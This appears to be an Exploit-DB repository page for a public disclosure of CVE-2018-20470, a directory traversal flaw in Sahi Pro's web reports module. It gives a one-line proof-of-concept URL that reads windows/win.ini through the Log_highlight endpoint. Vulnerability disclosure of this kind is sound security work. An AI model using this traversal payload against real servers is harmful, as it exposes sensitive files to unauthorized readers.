745971e212
5 changes to exploits/shellcodes Serv-U FTP Server < 15.1.7 - Local Privilege Escalation Sahi pro 7.x/8.x - Directory Traversal Sahi pro 8.x - SQL Injection Sahi pro 8.x - Cross-Site Scripting Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)
22 lines
No EOL
757 B
Text
22 lines
No EOL
757 B
Text
# Exploit Title: Sahi pro ( <= 8.x ) Directory traversal
|
|
# Date: 17-06-2019
|
|
# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
|
|
# Vendor Homepage: https://sahipro.com/
|
|
# Software Link: https://sahipro.com/downloads-archive/
|
|
# Version: 7.x , <= 8.x
|
|
# Tested on: Windows 10
|
|
# CVE : CVE-2018-20470
|
|
|
|
|
|
Description :
|
|
|
|
An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
|
|
|
|
POC :
|
|
|
|
vulnerable URL :
|
|
|
|
''' replace the ip and port of the remote sahi pro server machine '''
|
|
|
|
|
|
http://<ip>:<port>/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected |